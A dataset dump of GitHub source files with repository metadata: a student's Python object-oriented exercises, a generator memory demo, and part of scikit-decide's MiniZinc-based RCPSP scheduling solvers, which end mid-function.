predictions = np.dot(user_embedding, item_embedding.T)[-1]
for i in range(len(user)):
if user[i] != 0:
predictions[i] = 0
return predictions | [
"hladia199811@gmail.com"
] | hladia199811@gmail.com |
9cc87eddda144ed0c0936f3f7214858251fc8942 | 87c474b7fe909a11ee947bea8d3ae24e716fc53c | /pbo.py | d56c482c129018671e1a4542ed88383c0270eee1 | [] | no_license | fahrizzain91/pemrogramanbasisata | dc30857ddeae6e2f830168c413fe31762fe1aa6e | 25eaa81dd0ff16655c53a6692c9e8e6e9744bfae | refs/heads/master | 2020-05-04T18:27:40.386320 | 2019-04-03T19:50:40 | 2019-04-03T19:50:40 | 179,354,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,105 | py | #!/usr/bin/env python
# coding: utf-8
# In[10]:
class Kubus:
def __init__(self,s):
self.sisi = s
def tampilkansisi(self):
print(self.sisi)
def luas(self):
print("Luas : ",self.sisi**2)
def luaspermukaan(self):
print("Luas permukaan :",self.sisi**2*6)
def volume(self):
print("volume :",self.sisi**3)
kubus1 = Kubus(4)
kubus1.tampilkansisi()
kubus1.luas()
kubus1.luaspermukaan()
kubus1.volume()
# In[11]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
class Pegawai:
def __init__(self,n,j,g,lahir):
self.nama = n
self.jabatan = j
self.gaji = g
self.tahunlahir = lahir
def tampilkan(self):
print(self.nama,",",self.jabatan,",",self.gaji*30)
def tampilkanumur(self):
print("Umur :",tahun - self.tahunlahir)
p1 = Pegawai("m.fahriz zain jannan","Direktur",500000,2000)
p1.tampilkan()
p1.tampilkanumur()
# In[3]:
class Mahasiswa:
def __init__(self,n,no,ip):
self.nama = n
self.nim = no
self.ipk = ip
def ceklayak(self):
if(self.ipk<3):
print(self.nama,"tidak layak bidikmisi")
else:
print("Anda layak Bidikmisi")
def datamhs(self):
print(self.nama,",",self.nim,",",self.ipk)
m1 = Mahasiswa("M.fahriz zain jannan","180441100075",2.75)
m1.datamhs()
m1.ceklayak()
m2 = Mahasiswa("Siapa dia?","180441100030",3.5)
m2.datamhs()
m2.ceklayak()
print(m1==m2)
# In[1]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class pegawai:
def __init__(self, n, no, tl ,tg,bln, th):
self.nama = n
self.nim = no
self.tempat_lahir = tl
self.tanggal_lahir=tg
self.bulan_lahir=bln
self.tahun_lahir=th
def user(self):
print("nama",self.nama,"nim",self.nim)
def prediksi_umur(self):
self.usia=tahun-self.tahun_lahir
if(self.bulan_lahir==bulan):
if(self.tanggal_lahir>hari):
self.usia=self.usia-1
elif(self.bulan_lahir>bulan):
self.usia=self.usia-1
print("umur_sekarang",self.usia,"tahun")
pg1 = pegawai("zein","180441100075","pamekasan",8,6,2000)
pg1.user()
pg1.prediksi_umur()
# In[5]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class orang:
def __init__(self, n, no, tl ,tg,bln, th):
self.nama = n
self.nim = no
self.tempat_lahir = tl
self.tanggal_lahir=tg
self.bulan_lahir=bln
self.tahun_lahir=th
def perkenalkan_anda(self):
print("hello,saya", self.nama,"Nim",self.nim,"lahir_di",self.tempat_lahir,self.tanggal_lahir,self.bulan_lahir,self.tahun_lahir)
def prediksi_umur(self):
print("prediksi_Umur :",tahun - self.tahun_lahir,"")
def umur_sekarang(self):
self.usia=tahun-self.tahun_lahir
if(self.bulan_lahir==bulan):
if(self.tanggal_lahir>hari):
self.usia=self.usia-1
elif(self.bulan_lahir>bulan):
self.usia=self.usia-1
print("umur_sekarang",self.usia,"tahun")
org1 = orang("zein","180441100075","pamekasan",8,6,2000)
org1.perkenalkan_anda()
org1.prediksi_umur()
org1.umur_sekarang()
# In[2]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
class Mahasiswa:
def __init__(self,nim,nm):
self.npm = nim
self.nama = nm
def perkiraan_semester(self):
self.angkatan = "20"+self.npm[:2]
self.angkatan = int(self.angkatan)
self.smt = tahun - self.angkatan
if(bulan>=2 and bulan<=7):
if(self.smt ==1):
self.semester = "semester 2"
elif(self.smt ==2):
self.semester = "semester 4"
elif(self.smt ==3):
self.semester = "semester 6"
elif(self.smt ==4):
self.semester = "semester 8"
else:
self.semester = "semester tua"
if(bulan<2 and bulan>7):
if(self.smt ==1):
self.semester = "semester 1"
elif(self.smt ==2):
self.semester = "semester 3"
elif(self.smt ==3):
self.semester = "semester 5"
elif(self.smt ==4):
self.semester = "semester 7"
else:
self.semester = "semester tua"
def hasil(self):
print("nama : ",self.nama)
print("nim : ",self.npm)
print("Sekarang : ",self.semester,"\n")
m1 = Mahasiswa("180441100075","zein")
m1.perkiraan_semester()
m1.hasil()
m2=Mahasiswa("160441100075","tama")
m2.perkiraan_semester()
m2.hasil()
m3=Mahasiswa("180441100065","galih")
m3.perkiraan_semester()
m3.hasil()
# In[3]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class mahasiswa:
def __init__(self, n, no, tl ,tg,bln, th):
self.nama = n
self.nim = no
self.tempat_lahir = tl
self.tanggal_lahir=tg
self.bulan_lahir=bln
self.tahun_lahir=th
def perkenalan_saya(self):
print("hello,saya", self.nama,"Nim",self.nim,"lahir_di",self.tempat_lahir,self.tanggal_lahir,self.bulan_lahir,self.tahun_lahir)
def umur_sekarang(self):
print("preiksi_Umur :",tahun - self.tahun_lahir)
def prediksi_umur(self):
print("umur_saya :",tahun - self.tahun_lahir,"tahun",bulan - self.bulan_lahir,"bulan",hari - self.tanggal_lahir,"hari")
mhs1 = mahasiswa("zein","180441100075","pamekasan",8,6,2000)
mhs1.perkenalan_saya()
mhs1.umur_sekarang()
mhs1.prediksi_umur()
# In[4]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class orang:
def __init__(self, n, no, tl ,tg,bln, th):
self.nama = n
self.nim = no
self.tempat_lahir = tl
self.tanggal_lahir=tg
self.bulan_lahir=bln
self.tahun_lahir=th
def perkenalkan_anda(self):
print("hello,saya", self.nama,"Nim",self.nim,"lahir_di",self.tempat_lahir,self.tanggal_lahir,self.bulan_lahir,self.tahun_lahir)
def umur_sekarang(self):
print("preiksi_Umur :",tahun - self.tahun_lahir)
def prediksi_umur(self):
self.usia=tahun-self.tahun_lahir
if(self.bulan_lahir==bulan):
if(self.tanggal_lahir>hari):
self.usia=self.usia-1
elif(self.bulan_lahir>bulan):
self.usia=self.usia-1
print("umur_sekarang",self.usia,"tahun")
org1 = orang("zein","180441100075","pamekasan",8,6,2000)
org1.perkenalkan_anda()
org1.umur_sekarang()
org1.prediksi_umur()
# In[5]:
from datetime import datetime
sekarang = datetime.now()
tahun = sekarang.year
bulan = sekarang.month
hari = sekarang.day
class pegawai:
def __init__(self, n, no, tl ,tg,bln, th):
self.nama = n
self.nim = no
self.tempat_lahir = tl
self.tanggal_lahir=tg
self.bulan_lahir=bln
self.tahun_lahir=th
def user(self):
print("nama",self.nama,"nim",self.nim)
def prediksi_umur(self):
self.usia=tahun-self.tahun_lahir
if(self.bulan_lahir==bulan):
if(self.tanggal_lahir>hari):
self.usia=self.usia-1
elif(self.bulan_lahir>bulan):
self.usia=self.usia-1
print("umur_sekarang",self.usia,"tahun")
pg1 = pegawai("zein","180441100075","pamekasan",8,6,2000)
pg1.user()
pg1.prediksi_umur()
# In[6]:
class shark():
def swim(self):
print("the shark is swim")
def swim_backwards(self):
print("the shark cannot swim backwars,but can sink backward")
def skalaton(self):
print("the shark skelaton is mode of cartilago")
class clamfish():
def swim(self):
print("the clam fish is swim")
def swim_backwards(self):
print("the clamfish can swim backwars,but can sink backward")
def skalaton(self):
print("the clamfish skelaton is mode of bone")
abc=shark()
abc.skalaton()
easy=clamfish()
easy.skalaton()
for fish in(abc,easy):
fish.swim()
fish.swim_backwards()
fish.skalaton()
# In[7]:
class shark():
def swim(self):
print("the shark is swim")
def swim_backwards(self):
print("the shark cannot swim backwars,but can sink backward")
def skalaton(self):
print("the shark skelaton is mode of cartilago")
class clamfish():
def swim(self):
print("the clam fish is swim")
def swim_backwards(self):
print("the clamfish can swim backwars,but can sink backward")
def skalaton(self):
print("the clamfish skelaton is mode of bone")
abc=shark()
abc.skalaton()
easy=clamfish()
easy.skalaton()
# In[8]:
class user:
def __init__(self,n):
self._first_name=n
def p(self):
print ("hello",self._first_name)
class programer(user):
def __init__(self,n,last):
user.__init__(self,n)
self.last_name=last
def P(self):
print ("hello",self._first_name+" "+self.last_name)
brian=programer("zein","baim")
brian.P()
# In[9]:
class binatanng:
def __init__(self,nama):
self.nama=nama
def cara_berjalan(self):
raise NotImplementedError("sub class must implemented abstrak metho")
class kucing(binatanng):
def cara_berjalan(self):
return "berjalan merangkak"
def bersuara(self):
return "meong"
class anjing (binatanng):
def cara_berjalan(self):
return "berjalan merangkak"
def bersuara(self):
return "gog"
class ular (binatanng):
def cara_berjalan(self):
return "merayap"
def bersuara(self):
return "essst"
binatanng=[anjing('bull'),
kucing('anggora'),
ular('cobra')]
for binatanng in binatanng:
print(binatanng.nama,":",binatanng.bersuara(),":",binatanng.cara_berjalan())
# In[ ]:
| [
"zeinbaim4@gmail.com"
] | zeinbaim4@gmail.com |
ed84bab6c4de84ceb611a8624e6fe58f20161012 | 10581444baa6970a92a587d5cb28052387c7ae3f | /generators_size.py | b2a7e0317c339f6bb18d2d34add6dd99786b522b | [] | no_license | KKGITHUBNET/Python | adac034c2dbeca290cad3e00aeb00f22286f9e41 | be26917e4dcd822d703d2d75240712d403bec281 | refs/heads/master | 2022-11-13T14:23:57.415628 | 2020-07-04T20:35:43 | 2020-07-04T20:35:43 | 278,402,376 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | import sys
def my_range(n: int):
start=0
while start<n:
yield start
start += 1
big_range = my_range(5)
# big_range = range(5)
print("Big Range is {} bytes".format(sys.getsizeof(big_range)))
# creating a list containing all the values in big_range
big_list=[]
for val in big_range:
big_list.append(val)
print("Big List is {} bytes".format(sys.getsizeof(big_list)))
print(big_range)
print(big_list) | [
"noreply@github.com"
] | noreply@github.com |
89db78394769d2f53cdc241dbc7981412dde67f7 | 2d14aa082e33f3c9d2344ea6811a5b18ec906607 | /skdecide/discrete_optimization/rcpsp/solver/cp_solvers.py | 0e6d401ed2b4eb7947aac1cc87f569ee91c950c7 | [
"MIT"
] | permissive | walter-bd/scikit-decide | 4c0b54b7b2abdf396121cd256d1f931f0539d1bf | d4c5ae70cbe8b4c943eafa8439348291ed07dec1 | refs/heads/master | 2023-07-30T14:14:28.886267 | 2021-08-30T14:16:30 | 2021-09-03T06:46:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,649 | py | # Copyright (c) AIRBUS and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
from dataclasses import InitVar
from typing import Union, List
from skdecide.discrete_optimization.generic_tools.cp_tools import CPSolver, ParametersCP, CPSolverName,\
map_cp_solver_name
from skdecide.discrete_optimization.generic_tools.do_problem import ParamsObjectiveFunction, \
build_aggreg_function_and_params_objective
from skdecide.discrete_optimization.generic_tools.result_storage.result_storage import ResultStorage
from skdecide.discrete_optimization.rcpsp.rcpsp_model import RCPSPModel, RCPSPSolution, \
RCPSPModelCalendar, PartialSolution
from minizinc import Instance, Model, Solver
import json
from datetime import timedelta
import os
this_path = os.path.dirname(os.path.abspath(__file__))
files_mzn = {"single": os.path.join(this_path, "../minizinc/rcpsp_single_mode_mzn.mzn"),
"single-preemptive": os.path.join(this_path, "../minizinc/rcpsp_single_mode_mzn_preemptive.mzn"),
"multi": os.path.join(this_path, "../minizinc/rcpsp_multi_mode_mzn.mzn"),
"multi-no-bool": os.path.join(this_path, "../minizinc/rcpsp_multi_mode_mzn_no_bool.mzn"),
"multi-calendar": os.path.join(this_path, "../minizinc/rcpsp_multi_mode_mzn_calendar.mzn"),
"multi-calendar-boxes": os.path.join(this_path, "../minizinc/rcpsp_mzn_calendar_boxes.mzn"),
"modes": os.path.join(this_path, "../minizinc/mrcpsp_mode_satisfy.mzn")}
class RCPSPSolCP:
objective: int
__output_item: InitVar[str] = None
def __init__(self, objective, _output_item, **kwargs):
self.objective = objective
self.dict = kwargs
print("One solution ", self.objective)
def check(self) -> bool:
return True
class CP_RCPSP_MZN(CPSolver):
def __init__(self, rcpsp_model: RCPSPModel,
cp_solver_name: CPSolverName=CPSolverName.CHUFFED,
params_objective_function: ParamsObjectiveFunction=None, **kwargs):
self.rcpsp_model = rcpsp_model
self.instance: Instance = None
self.cp_solver_name = cp_solver_name
self.key_decision_variable = ["s"] # For now, I've put the var name of the CP model (not the rcpsp_model)
self.aggreg_sol, self.aggreg_from_dict_values, self.params_objective_function = \
build_aggreg_function_and_params_objective(self.rcpsp_model,
params_objective_function=params_objective_function)
def init_model(self, **args):
model_type = args.get("model_type", "single")
if model_type == "single-preemptive":
nb_preemptive = args.get("nb_preemptive", 2)
model = Model(files_mzn[model_type])
custom_output_type = args.get("output_type", False)
if custom_output_type:
model.output_type = RCPSPSolCP
self.custom_output_type = True
solver = Solver.lookup(map_cp_solver_name[self.cp_solver_name])
instance = Instance(solver, model)
if model_type == "single-preemptive":
instance["nb_preemptive"] = nb_preemptive
# TODO : make this as options.
instance["possibly_preemptive"] = [True for task in self.rcpsp_model.mode_details]
instance["max_preempted"] = 3
n_res = len(list(self.rcpsp_model.resources.keys()))
# print('n_res: ', n_res)
instance["n_res"] = n_res
sorted_resources = sorted(self.rcpsp_model.resources_list)
self.resources_index = sorted_resources
rc = [int(self.rcpsp_model.resources[r])
for r in sorted_resources]
# print('rc: ', rc)
instance["rc"] = rc
n_tasks = self.rcpsp_model.n_jobs + 2
# print('n_tasks: ', n_tasks)
instance["n_tasks"] = n_tasks
sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
d = [int(self.rcpsp_model.mode_details[key][1]['duration']) for key in sorted_tasks]
# print('d: ', d)
instance["d"] = d
rr = []
index = 0
for res in sorted_resources:
rr.append([])
for task in sorted_tasks:
rr[index].append(int(self.rcpsp_model.mode_details[task][1][res]))
index += 1
instance["rr"] = rr
suc = [set(self.rcpsp_model.successors[task]) for task in sorted_tasks]
instance["suc"] = suc
self.instance = instance
p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
if p_s is not None:
constraint_strings = []
if p_s.start_times is not None:
for task in p_s.start_times:
string = "constraint s[" + str(task) + "] == " + str(p_s.start_times[task]) + ";\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.partial_permutation is not None:
for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
string = "constraint s[" + str(t1) + "] <= s[" + str(t2) + "];\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.list_partial_order is not None:
for l in p_s.list_partial_order:
for t1, t2 in zip(l[:-1], l[1:]):
string = "constraint s[" + str(t1) + "] <= s[" + str(t2) + "];\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.start_together is not None:
for t1, t2 in p_s.start_together:
string = "constraint s[" + str(t1) + "] == s[" + str(t2) + "];\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.start_after_nunit is not None:
for t1, t2, delta in p_s.start_after_nunit:
string = "constraint s[" + str(t2) + "] >= s[" + str(t1) + "]+"+str(delta)+";\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.start_at_end_plus_offset is not None:
for t1, t2, delta in p_s.start_at_end_plus_offset:
string = "constraint s[" + str(t2) + "] >= s[" + str(t1) + "]+d["+str(t1)+"]+"+str(delta)+";\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.start_at_end is not None:
for t1, t2 in p_s.start_at_end:
string = "constraint s[" + str(t2) + "] == s[" + str(t1) + "]+d["+str(t1)+"];\n"
self.instance.add_string(string)
constraint_strings += [string]
def retrieve_solutions(self, result, parameters_cp: ParametersCP=ParametersCP.default())->ResultStorage:
intermediate_solutions = parameters_cp.intermediate_solution
best_solution = None
best_makespan = -float("inf")
list_solutions_fit = []
starts = []
if intermediate_solutions:
for i in range(len(result)):
if isinstance(result[i], RCPSPSolCP):
starts += [result[i].dict["s"]]
else:
starts += [result[i, "s"]]
else:
if isinstance(result, RCPSPSolCP):
starts += [result.dict["s"]]
else:
starts = [result["s"]]
for start_times in starts:
rcpsp_schedule = {}
for k in range(len(start_times)):
rcpsp_schedule[k + 1] = {'start_time': start_times[k],
'end_time': start_times[k]
+ self.rcpsp_model.mode_details[k + 1][1]['duration']}
sol = RCPSPSolution(problem=self.rcpsp_model,
rcpsp_schedule=rcpsp_schedule, rcpsp_schedule_feasible=True)
objective = self.aggreg_from_dict_values(self.rcpsp_model.evaluate(sol))
if objective > best_makespan:
best_makespan = objective
best_solution = sol.copy()
list_solutions_fit += [(sol, objective)]
result_storage = ResultStorage(list_solution_fits=list_solutions_fit,
best_solution=best_solution,
mode_optim=self.params_objective_function.sense_function,
limit_store=False)
return result_storage
def solve(self, parameters_cp: ParametersCP=ParametersCP.default(), **args): # partial_solution: PartialSolution=None, **args):
if self.instance is None:
self.init_model(**args)
timeout = parameters_cp.TimeLimit
intermediate_solutions = parameters_cp.intermediate_solution
try:
result = self.instance.solve(timeout=timedelta(seconds=timeout),
intermediate_solutions=intermediate_solutions)
except Exception as e:
print(e)
return None
verbose = args.get("verbose", False)
if verbose:
print(result.status)
print(result.statistics["solveTime"])
return self.retrieve_solutions(result, parameters_cp=parameters_cp)
class CP_MRCPSP_MZN(CPSolver):
def __init__(self,
rcpsp_model: RCPSPModel,
cp_solver_name: CPSolverName=CPSolverName.CHUFFED,
params_objective_function: ParamsObjectiveFunction=None, **kwargs):
self.rcpsp_model = rcpsp_model
self.instance = None
self.cp_solver_name = cp_solver_name
self.key_decision_variable = ["start", "mrun"] # For now, I've put the var names of the CP model (not the rcpsp_model)
self.aggreg_sol, self.aggreg_from_dict_values, self.params_objective_function = \
build_aggreg_function_and_params_objective(self.rcpsp_model,
params_objective_function=params_objective_function)
self.calendar = False
if isinstance(self.rcpsp_model, RCPSPModelCalendar):
self.calendar = True
def init_model(self, **args):
model_type = args.get("model_type", None)
if model_type is None:
model_type = "multi" if not self.calendar else "multi-calendar"
model = Model(files_mzn[model_type])
custom_output_type = args.get("output_type", False)
if custom_output_type:
model.output_type = RCPSPSolCP
self.custom_output_type = True
solver = Solver.lookup(map_cp_solver_name[self.cp_solver_name])
resources_list = list(self.rcpsp_model.resources.keys())
self.resources_index = resources_list
instance = Instance(solver, model)
n_res = len(resources_list)
# print('n_res: ', n_res)
keys = []
instance["n_res"] = n_res
keys += ["n_res"]
# rc = [val for val in self.rcpsp_model.resources.values()]
# # print('rc: ', rc)
# instance["rc"] = rc
n_tasks = self.rcpsp_model.n_jobs + 2
# print('n_tasks: ', n_tasks)
instance["n_tasks"] = n_tasks
keys += ["n_tasks"]
sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
# print('mode_details: ', self.rcpsp_model.mode_details)
n_opt = sum([len(list(self.rcpsp_model.mode_details[key].keys())) for key in sorted_tasks])
# print('n_opt: ', n_opt)
instance["n_opt"] = n_opt
keys += ["n_opt"]
modes = []
dur = []
self.modeindex_map = {}
general_counter = 1
for act in sorted_tasks:
tmp = sorted(self.rcpsp_model.mode_details[act].keys())
# tmp = [counter + x for x in tmp]
set_mode_task = set()
for i in range(len(tmp)):
original_mode_index = tmp[i]
set_mode_task.add(general_counter)
self.modeindex_map[general_counter] = {'task': act, 'original_mode_index': original_mode_index}
general_counter += 1
modes.append(set_mode_task)
dur = dur + [self.rcpsp_model.mode_details[act][key]['duration']
for key in tmp]
# print('modes: ', modes)
instance['modes'] = modes
keys += ["modes"]
# print('dur: ', dur)
instance['dur'] = dur
keys += ["dur"]
rreq = []
index = 0
for res in resources_list:
rreq.append([])
for task in sorted_tasks:
for mod in sorted(self.rcpsp_model.mode_details[task].keys()):
rreq[index].append(int(self.rcpsp_model.mode_details[task][mod][res]))
index += 1
# print('rreq: ', rreq)
instance["rreq"] = rreq
keys += ["rreq"]
if not self.calendar:
rcap = [int(self.rcpsp_model.resources[x]) for x in resources_list]
else:
rcap = [int(max(self.rcpsp_model.resources[x])) for x in resources_list]
# print('rcap: ', rcap)
instance["rcap"] = rcap
keys += ["rcap"]
# print('non_renewable_resources:', self.rcpsp_model.non_renewable_resources)
rtype = [2 if res in self.rcpsp_model.non_renewable_resources else 1
for res in resources_list]
# print('rtype: ', rtype)
instance["rtype"] = rtype
keys += ["rtype"]
succ = [set(self.rcpsp_model.successors[task]) for task in sorted_tasks]
# print('succ: ', succ)
instance["succ"] = succ
keys += ["succ"]
if self.calendar:
one_ressource = list(self.rcpsp_model.resources.keys())[0]
instance["max_time"] = len(self.rcpsp_model.resources[one_ressource])
print(instance["max_time"])
keys += ["max_time"]
ressource_capacity_time = [[int(x) for x in self.rcpsp_model.resources[res]]
for res in resources_list]
# print(instance["max_time"])
# print(len(ressource_capacity_time))
# print([len(x) for x in ressource_capacity_time])
instance["ressource_capacity_time"] = ressource_capacity_time
keys += ["ressource_capacity_time"]
# import pymzn
# pymzn.dict2dzn({key: instance[key] for key in keys},
# fout='rcpsp_.dzn')
self.instance = instance
p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
if p_s is not None:
constraint_strings = []
if p_s.start_times is not None:
for task in p_s.start_times:
string = "constraint start[" + str(task) + "] == " + str(p_s.start_times[task]) + ";\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.partial_permutation is not None:
for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
string = "constraint start[" + str(t1) + "] <= start[" + str(t2) + "];\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.list_partial_order is not None:
for l in p_s.list_partial_order:
for t1, t2 in zip(l[:-1], l[1:]):
string = "constraint start[" + str(t1) + "] <= start[" + str(t2) + "];\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.task_mode is not None:
for task in p_s.start_times:
indexes = [i for i in self.modeindex_map if self.modeindex_map[i]["task"] == task
and self.modeindex_map[i]["original_mode_index"] == p_s.task_mode[task]]
if len(indexes) >= 0:
string = "constraint mrun["+str(indexes[0])+"] == 1;"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.start_together is not None:
for t1, t2 in p_s.start_together:
string = "constraint start[" + str(t1) + "] == start[" + str(t2) + "];\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.start_after_nunit is not None:
for t1, t2, delta in p_s.start_after_nunit:
string = "constraint start[" + str(t2) + "] >= start[" + str(t1) + "]+"+str(delta)+";\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.start_at_end_plus_offset is not None:
for t1, t2, delta in p_s.start_at_end_plus_offset:
string = "constraint start[" + str(t2) + "] >= start[" + str(t1) + "]+adur["+str(t1)+"]+"+str(delta)+";\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.start_at_end is not None:
for t1, t2 in p_s.start_at_end:
string = "constraint start[" + str(t2) + "] == start[" + str(t1) + "]+adur["+str(t1)+"];\n"
self.instance.add_string(string)
constraint_strings += [string]
def retrieve_solutions(self, result, parameters_cp: ParametersCP=ParametersCP.default()):
intermediate_solutions = parameters_cp.intermediate_solution
best_solution = None
best_makespan = -float("inf")
list_solutions_fit = []
starts = []
mruns = []
if intermediate_solutions:
for i in range(len(result)):
if isinstance(result[i], RCPSPSolCP):
starts += [result[i].dict["start"]]
mruns += [result[i].dict["mrun"]]
else:
starts += [result[i, "start"]]
mruns += [result[i, "mrun"]]
else:
if isinstance(result, RCPSPSolCP):
starts += [result.dict["start"]]
mruns += [result.dict["mrun"]]
else:
starts = [result["start"]]
mruns = [result["mrun"]]
for start_times, mrun in zip(starts, mruns):
modes = []
for i in range(len(mrun)):
if mrun[i] and (self.modeindex_map[i + 1]['task'] != 1) and (
self.modeindex_map[i + 1]['task'] != self.rcpsp_model.n_jobs + 2):
modes.append(self.modeindex_map[i + 1]['original_mode_index'])
elif (self.modeindex_map[i + 1]['task'] == 1) or (
self.modeindex_map[i + 1]['task'] == self.rcpsp_model.n_jobs + 2):
modes.append(1)
rcpsp_schedule = {}
for i in range(len(start_times)):
rcpsp_schedule[i + 1] = {'start_time': start_times[i],
'end_time': start_times[i]
+ self.rcpsp_model.mode_details[i + 1][modes[i]]['duration']}
sol = RCPSPSolution(problem=self.rcpsp_model,
rcpsp_schedule=rcpsp_schedule,
rcpsp_modes=modes[1:-1],
rcpsp_schedule_feasible=True)
objective = self.aggreg_from_dict_values(self.rcpsp_model.evaluate(sol))
if objective > best_makespan:
best_makespan = objective
best_solution = sol.copy()
list_solutions_fit += [(sol, objective)]
result_storage = ResultStorage(list_solution_fits=list_solutions_fit,
best_solution=best_solution,
mode_optim=self.params_objective_function.sense_function,
limit_store=False)
return result_storage
def solve(self, parameters_cp: ParametersCP=ParametersCP.default(), **args):
if self.instance is None:
self.init_model(**args)
timeout = parameters_cp.TimeLimit
intermediate_solutions = parameters_cp.intermediate_solution
result = self.instance.solve(timeout=timedelta(seconds=timeout),
intermediate_solutions=intermediate_solutions)
verbose = args.get("verbose", True)
if verbose:
print(result.status)
return self.retrieve_solutions(result=result, parameters_cp=parameters_cp)
class MRCPSP_Result:
objective: int
__output_item: InitVar[str] = None
def __init__(self, objective, _output_item, **kwargs):
self.objective = objective
self.dict = kwargs
self.mode_chosen = json.loads(_output_item)
def check(self) -> bool:
return True
class CP_MRCPSP_MZN_NOBOOL(CPSolver):
def __init__(self,
rcpsp_model: RCPSPModel,
cp_solver_name: CPSolverName=CPSolverName.CHUFFED,
params_objective_function: ParamsObjectiveFunction=None, **kwargs):
self.rcpsp_model = rcpsp_model
self.instance = None
self.cp_solver_name = cp_solver_name
self.key_decision_variable = ["start", "mrun"] # For now, I've put the var names of the CP model (not the rcpsp_model)
self.aggreg_sol, self.aggreg_from_dict_values, self.params_objective_function = \
build_aggreg_function_and_params_objective(self.rcpsp_model,
params_objective_function=params_objective_function)
self.calendar = False
if isinstance(self.rcpsp_model, RCPSPModelCalendar):
self.calendar = True
def init_model(self, **args):
model = Model(files_mzn["multi-no-bool"])
model.output_type = MRCPSP_Result
solver = Solver.lookup(map_cp_solver_name[self.cp_solver_name])
resources_list = list(self.rcpsp_model.resources.keys())
instance = Instance(solver, model)
n_res = len(resources_list)
# print('n_res: ', n_res)
keys = []
instance["n_res"] = n_res
keys += ["n_res"]
# rc = [val for val in self.rcpsp_model.resources.values()]
# # print('rc: ', rc)
# instance["rc"] = rc
n_tasks = self.rcpsp_model.n_jobs + 2
# print('n_tasks: ', n_tasks)
instance["n_tasks"] = n_tasks
keys += ["n_tasks"]
sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
# print('mode_details: ', self.rcpsp_model.mode_details)
n_opt = sum([len(list(self.rcpsp_model.mode_details[key].keys())) for key in sorted_tasks])
# print('n_opt: ', n_opt)
instance["n_opt"] = n_opt
keys += ["n_opt"]
modes = []
dur = []
counter = 0
self.modeindex_map = {}
general_counter = 1
for act in sorted_tasks:
tmp = sorted(self.rcpsp_model.mode_details[act].keys())
# tmp = [counter + x for x in tmp]
set_mode_task = set()
for i in range(len(tmp)):
original_mode_index = tmp[i]
set_mode_task.add(general_counter)
self.modeindex_map[general_counter] = {'task': act, 'original_mode_index': original_mode_index}
general_counter += 1
modes.append(set_mode_task)
dur = dur + [self.rcpsp_model.mode_details[act][key]['duration']
for key in tmp]
# print('modes: ', modes)
instance['modes'] = modes
keys += ["modes"]
# print('dur: ', dur)
instance['dur'] = dur
keys += ["dur"]
rreq = []
index = 0
for res in resources_list:
rreq.append([])
for task in sorted_tasks:
for mod in sorted(self.rcpsp_model.mode_details[task].keys()):
rreq[index].append(int(self.rcpsp_model.mode_details[task][mod][res]))
index += 1
# print('rreq: ', rreq)
instance["rreq"] = rreq
keys += ["rreq"]
if not self.calendar:
rcap = [self.rcpsp_model.resources[x] for x in resources_list]
else:
rcap = [int(max(self.rcpsp_model.resources[x])) for x in resources_list]
# print('rcap: ', rcap)
instance["rcap"] = rcap
keys += ["rcap"]
# print('non_renewable_resources:', self.rcpsp_model.non_renewable_resources)
rtype = [2 if res in self.rcpsp_model.non_renewable_resources else 1
for res in resources_list]
# print('rtype: ', rtype)
instance["rtype"] = rtype
keys += ["rtype"]
succ = [set(self.rcpsp_model.successors[task]) for task in sorted_tasks]
# print('succ: ', succ)
instance["succ"] = succ
keys += ["succ"]
if self.calendar:
one_ressource = list(self.rcpsp_model.resources.keys())[0]
instance["max_time"] = len(self.rcpsp_model.resources[one_ressource])
print(instance["max_time"])
keys += ["max_time"]
ressource_capacity_time = [[int(x) for x in self.rcpsp_model.resources[res]]
for res in resources_list]
# print(instance["max_time"])
# print(len(ressource_capacity_time))
# print([len(x) for x in ressource_capacity_time])
instance["ressource_capacity_time"] = ressource_capacity_time
keys += ["ressource_capacity_time"]
# import pymzn
# pymzn.dict2dzn({key: instance[key] for key in keys},
# fout='rcpsp_.dzn')
self.instance = instance
p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
if p_s is not None:
constraint_strings = []
if p_s.start_times is not None:
for task in p_s.start_times:
string = "constraint start[" + str(task) + "] == " + str(p_s.start_times[task]) + ";\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.partial_permutation is not None:
for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
string = "constraint start[" + str(t1) + "] <= start[" + str(t2) + "];\n"
self.instance.add_string(string)
constraint_strings += [string]
if p_s.list_partial_order is not None:
for l in p_s.list_partial_order:
for t1, t2 in zip(l[:-1], l[1:]):
